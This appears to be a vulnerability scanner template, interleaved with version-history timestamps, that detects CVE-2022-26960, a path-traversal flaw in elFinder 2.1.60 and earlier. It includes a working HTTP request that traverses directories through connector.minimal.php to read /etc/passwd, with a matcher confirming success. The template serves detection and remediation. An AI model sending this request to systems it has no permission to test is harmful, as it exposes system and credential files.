2022-06-30 23:31:46 +00:00
id : CVE-2022-26960
info :
2022-07-05 17:21:14 +00:00
name : elFinder <=2.1.60 - Local File Inclusion
2022-06-30 23:31:46 +00:00
author : pikpikcu
2022-07-04 12:56:40 +00:00
severity : critical
2022-06-30 23:31:46 +00:00
description : |
2022-07-05 17:21:14 +00:00
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
2023-09-06 11:59:08 +00:00
remediation : |
Upgrade elFinder to version 2.1.61 or later to mitigate this vulnerability.
2022-06-30 23:31:46 +00:00
reference :
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
2022-07-04 12:56:40 +00:00
- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
- https://www.synacktiv.com/publications.html
2022-07-05 17:21:14 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
2022-07-04 12:56:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score : 9.1
cve-id : CVE-2022-26960
cwe-id : CWE-22
2023-11-10 17:07:52 +00:00
epss-score : 0.88417
2024-01-14 13:49:27 +00:00
epss-percentile : 0.98433
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*
2022-07-04 12:32:11 +00:00
metadata :
2022-07-06 09:08:13 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : std42
product : elfinder
2024-01-14 09:21:50 +00:00
tags : cve2022,cve,lfi,elfinder,std42
2022-06-30 23:31:46 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-06-30 23:31:46 +00:00
- raw :
- |
2022-07-04 12:32:11 +00:00
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
2022-06-30 23:31:46 +00:00
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
matchers-condition : and
matchers :
- type : regex
regex :
- "root:.*:0:0:"
2022-07-04 12:32:11 +00:00
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 490a0046304402204cc48b95204bec849af8cb9b0c2a887407df7d9931f1c1d26fa625985f6a144e02203c8acd3a044c0f112ed2af89d5cf6ca48ff3d1c9a075a17717dca297ea10bb80:922c64590222798bb761d5b6d8e72950